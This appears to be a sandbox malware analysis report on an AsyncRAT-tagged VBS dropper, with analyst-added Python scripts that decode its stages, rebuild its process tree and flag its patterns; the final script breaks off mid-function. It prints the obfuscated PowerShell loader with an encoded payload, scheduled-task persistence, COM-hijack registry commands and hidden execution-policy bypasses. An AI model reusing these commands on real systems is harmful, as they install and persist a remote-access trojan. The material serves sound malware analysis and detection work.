Malware Analysis Report

2024-11-30 19:35

Sample ID 240917-bhcaaayfml
Target 343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs
SHA256 343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663
Tags
execution asyncrat sasa agilenet discovery persistence privilege_escalation rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663

Threat Level: Known bad

The file 343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs was found to be: Known bad.

Malicious Activity Summary

execution asyncrat sasa agilenet discovery persistence privilege_escalation rat

AsyncRat

Async RAT payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Event Triggered Execution: Component Object Model Hijacking

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Modifies registry key

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-17 01:08

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-17 01:08

Reported

2024-09-17 01:10

Platform

win7-20240903-en

Max time kernel

117s

Max time network

117s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('…'));powershell $zcxuqriwmospjyfktlgb

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( '…' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"
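The two powershell.exe command lines above are a two-stage loader: stage 0 base64-decodes a string as ASCII and hands it to a second powershell, and stage 1 base64-decodes a blob, inflates it with DeflateStream (raw DEFLATE, no zlib header) and pipes the result into IEX. The cmdlet and type names are case-randomised to defeat naive string matching. The decoder below is an added example, not code from the report or the sandbox; it peels both layer types case-insensitively and returns every layer so the hops are visible. The stage text it decodes is constructed here, since the report's blobs are elided above; pointing decode_once() at a real command line from the submission works the same way. It does not handle -EncodedCommand, which is UTF-16LE rather than ASCII.

```python
"""Unwrap the base64 / raw-DEFLATE PowerShell stages used by this loader.

Added example, not code from the report. The stage text below is constructed
to have the same shape as the report's two powershell.exe command lines.
"""
import base64
import re
import zlib
from typing import List, Optional

# Matches the literal handed to [Convert]::FromBase64String(...) in any letter
# case, because the loader randomises case to break simple string matching.
B64_LITERAL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.IGNORECASE)
DEFLATE_HINT = re.compile(r"DeflateStream", re.IGNORECASE)


def raw_deflate(data: bytes) -> bytes:
    """Raw DEFLATE (no zlib header), the format .NET's DeflateStream emits."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def decode_once(cmdline: str) -> Optional[str]:
    """Decode one layer. Returns the inner script, or None when there is no
    FromBase64String literal left to peel."""
    m = B64_LITERAL.search(cmdline)
    if m is None:
        return None
    blob = base64.b64decode(m.group(1))
    if DEFLATE_HINT.search(cmdline):
        blob = zlib.decompress(blob, -15)  # wbits=-15: raw DEFLATE, as DeflateStream
    # The loader reads the stream as ASCII; 'replace' keeps odd bytes visible.
    return blob.decode("ascii", errors="replace")


def unwrap(cmdline: str, max_depth: int = 8) -> List[str]:
    """Peel nested stages until plain script remains. Returns every layer,
    outermost first, so each hop can be inspected."""
    layers = [cmdline]
    for _ in range(max_depth):
        inner = decode_once(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers


# --- constructed sample chain (hypothetical final script) ---------------------
FINAL_SCRIPT = "Start-Process powershell -ArgumentList 'C:\\ProgramData\\Cloud\\cloud.ps1'"


def build_stage1(script: str) -> str:
    """Stage 1: raw DEFLATE + base64, mixed case, fed to IEX."""
    b64 = base64.b64encode(raw_deflate(script.encode("ascii"))).decode()
    return ("IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM]"
            "[coNVeRT]::frombAse64sTriNG( '" + b64 + "' ), "
            "[IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS) | % {...} )")


def build_stage0(stage1: str) -> str:
    """Stage 0: plain base64 of stage 1, run through a second powershell."""
    b64 = base64.b64encode(stage1.encode("ascii")).decode()
    return ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
            "$v = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
            + b64 + "'));powershell $v")


SAMPLE_CMDLINE = build_stage0(build_stage1(FINAL_SCRIPT))

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap(SAMPLE_CMDLINE)):
        print(f"--- layer {depth} ---\n{layer[:160]}")
```

Decoding statically like this avoids running the script at all; the inflated text is what the sandbox executed as the third powershell.exe, so it is where the download or drop of C:\ProgramData\Cloud\ should be visible.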

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | www1.coulmandental.com | udp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp

Files

memory/1616-4-0x000007FEF551E000-0x000007FEF551F000-memory.dmp

memory/1616-5-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/1616-7-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

memory/1616-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/1616-8-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

memory/1616-9-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

memory/1616-10-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 af5e7f2ef23eecc37b751cf6f87223e4
SHA1 75c67cdc46a28d08b454d5715bee78e173557714
SHA256 f5e57a22d57b2469af08b583a7b210343cd7ebd7c0a83669b97b038b9c7c5710
SHA512 d85435bd3ccf41cfba1be90de0d3a47542b2709100f6d75d53fa30fa2eca597ffa8fe01710eae58dedc41b1d39d96f82eb21be9557c8aaad3344e2753af8c08e

memory/1616-16-0x000007FEF551E000-0x000007FEF551F000-memory.dmp

memory/1616-17-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

memory/1616-18-0x000007FEF5260000-0x000007FEF5BFD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-17 01:08

Reported

2024-09-17 01:10

Platform

win10v2004-20240802-en

Max time kernel

125s

Max time network

148s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Obfuscated with Agile.Net obfuscator

agilenet
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2188 wrote to memory of 2232 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2232 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 1900 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 1900 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1900 wrote to memory of 4200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 1900 wrote to memory of 4200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 4464 wrote to memory of 3520 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 4464 wrote to memory of 3520 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 3520 wrote to memory of 3200 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 3200 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 848 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 848 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 2860 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 3520 wrote to memory of 2860 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2860 wrote to memory of 3196 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 3196 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3196 wrote to memory of 3308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3196 wrote to memory of 3308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3196 wrote to memory of 3308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3196 wrote to memory of 3308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
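The WriteProcessMemory rows are the only place this report records parent/child relationships, and the sandbox logs one row per write, so the tree is buried in duplicates. The script below is an added example, not part of the report; it takes the rows as the sandbox emits them, de-duplicates the edges and prints the tree. Two roots come out: PID 2188, the WScript.exe that ran the submitted sample and ended in schtasks.exe, and PID 4464, a second WScript.exe whose subtree (cmd.exe, two reg.exe, a hidden powershell.exe, RegSvcs.exe) matches the cloud.vbs chain in the Processes list, consistent with the "Cloud OneDrive" task firing on its two-minute trigger during the run. RegSvcs.exe at the leaf is the process the discovery, hook and SeDebugPrivilege signatures fire in.

```python
"""Rebuild the behavioral2 process tree from the WriteProcessMemory rows.

Added example, not part of the report. ROWS are the report's own
'Suspicious use of WriteProcessMemory' entries in the sandbox's own format.
"""
import re
from collections import OrderedDict

ROWS = r"""
PID 2188 wrote to memory of 2232 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2232 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 1900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 1900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1900 wrote to memory of 4200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1900 wrote to memory of 4200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 4464 wrote to memory of 3520 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4464 wrote to memory of 3520 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3520 wrote to memory of 3200 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 3200 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3520 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 3520 wrote to memory of 2860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2860 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3196 wrote to memory of 3308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3196 wrote to memory of 3308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3196 wrote to memory of 3308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 3196 wrote to memory of 3308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
"""

# "PID <ppid> wrote to memory of <pid> <indicator> <parent image> <child image>"
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \S+ (\S+) (\S+)$")


def parse_rows(text):
    """Return (parent_pid, child_pid, parent_image, child_image) per row."""
    out = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            out.append((int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)))
    return out


def build_tree(events):
    """children: ppid -> ordered, de-duplicated child pids; names: pid -> image."""
    children, names = OrderedDict(), {}
    for ppid, pid, pimg, cimg in events:
        names.setdefault(ppid, pimg)
        names.setdefault(pid, cimg)
        kids = children.setdefault(ppid, [])
        if pid not in kids:  # one row per write; we want one edge per pair
            kids.append(pid)
    return children, names


def roots(children):
    """Pids that write into others but were never written into themselves."""
    written_to = {c for kids in children.values() for c in kids}
    return [p for p in children if p not in written_to]


def render(children, names, pid, depth=0, lines=None):
    """Indented tree, one process per line, image basename only."""
    lines = [] if lines is None else lines
    base = names[pid].rsplit("\\", 1)[-1]
    lines.append("  " * depth + f"{pid}  {base}")
    for kid in children.get(pid, []):
        render(children, names, kid, depth + 1, lines)
    return lines


def process_tree(text=ROWS):
    children, names = build_tree(parse_rows(text))
    return [line for r in roots(children) for line in render(children, names, r)]


if __name__ == "__main__":
    print("\n".join(process_tree()))
```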

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3988,i,5469445176230119590,7931734017267321834,262144 --variations-seed-version --mojo-platform-channel-handle=3956 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('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'));powershell $zcxuqriwmospjyfktlgb

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f

C:\Windows\system32\cmd.exe

cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
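The Processes list above spells out the persistence chain: schtasks.exe registers "Cloud OneDrive" to run C:\ProgramData\Cloud\cloud.vbs every two minutes; cloud.vbs runs cloud.bat, which uses reg.exe to create a per-user CLSID whose InProcServer32 default value points at C:\RedroCrypt.dll and then launches cloud.ps1 hidden, with the execution policy bypassed; that script ends in RegSvcs.exe. The per-user CLSID matters because HKEY_CLASSES_ROOT merges HKCU\Software\Classes ahead of HKLM for processes running at medium integrity, so a user-writable key redirects COM activation of that class to an attacker DLL without administrator rights (elevated processes ignore per-user CLSID registrations). Note that C:\RedroCrypt.dll does not appear in the Files list of this run, so either it was never written here or the sandbox did not record it. The triage below is an added example, not code from the report; rule names and thresholds are my own, and it runs over the command lines as listed above.

```python
"""Flag the persistence and evasion patterns in the behavioral2 command lines.

Added example, not part of the report. CMDLINES are the report's own process
command lines; the rules and their names are my choices.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    detail: str
    cmdline: str


CMDLINES = [
    r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663.vbs"',
    r'"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs',
    r'C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"',
    r'"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat',
    r'REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f',
    r'REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f',
    r'cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"',
    r'Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"',
    r'"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"',
]

SCRIPT_EXT = (".vbs", ".js", ".jse", ".wsf", ".bat", ".cmd", ".ps1", ".hta")
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files")
COM_KEY = re.compile(
    r'reg(?:\.exe)?"?\s+add\s+"?(?:HKCU|HKEY_CURRENT_USER)\\software\\classes\\clsid\\'
    r'(\{[0-9a-f-]{36}\})(\\InProcServer32)?', re.I)
PS_FLAGS = {  # abbreviations PowerShell itself accepts
    "noprofile": r"-nop(?:rofile)?\b",
    "noninteractive": r"-noni(?:nteractive)?\b",
    "hidden": r"-w(?:indowstyle)?\s+hidden\b",
    "bypass": r"-e(?:p|xecutionpolicy)\s+bypass\b",
}


def _opt(cmd, name):
    """Value of a /name option, quotes stripped; None when absent."""
    m = re.search(rf'/{name}\s+("[^"]*"|\S+)', cmd, re.I)
    return m.group(1).strip('"') if m else None


def rule_schtasks(cmd):
    """Minute-granularity task whose action is a script or lives in user-writable space."""
    if not re.search(r'schtasks(?:\.exe)?"?\s+/create\b', cmd, re.I):
        return None
    sc, mo, tr = _opt(cmd, "sc"), _opt(cmd, "mo"), _opt(cmd, "tr") or ""
    minutes = None
    if (sc or "").lower() == "minute":
        minutes = int(mo) if mo and mo.isdigit() else 1
    low = tr.lower()
    scripty = low.endswith(SCRIPT_EXT) or any(d in low for d in USER_WRITABLE)
    if minutes is not None and scripty:
        return Finding("schtasks_short_interval_script",
                       f"task {_opt(cmd, 'tn')!r} every {minutes} min -> {tr}", cmd)
    return None


def rule_com(cmd):
    """reg add under HKCU\\Software\\Classes\\CLSID: per-user COM registration."""
    m = COM_KEY.search(cmd)
    if not m:
        return None
    clsid, inproc = m.group(1), bool(m.group(2))
    if not inproc:
        return Finding("user_clsid_key_created", f"{clsid} under HKCU\\Software\\Classes", cmd)
    dll = _opt(cmd, "d") or ""
    if dll.lower().startswith(TRUSTED_DLL_DIRS):
        return None
    return Finding("com_hijack_user_clsid", f"{clsid} InProcServer32 -> {dll}", cmd)


def rule_powershell(cmd):
    """Two or more of the classic hide-and-bypass switches on one powershell launch."""
    if not re.search(r"\bpowershell(?:\.exe)?\b", cmd, re.I):
        return None
    hits = [k for k, pat in PS_FLAGS.items() if re.search(pat, cmd, re.I)]
    if len(hits) >= 2:
        return Finding("powershell_evasive_flags", "+".join(hits), cmd)
    return None


RULES = (rule_schtasks, rule_com, rule_powershell)


def triage(cmdlines):
    """Run every rule over every command line, keeping report order."""
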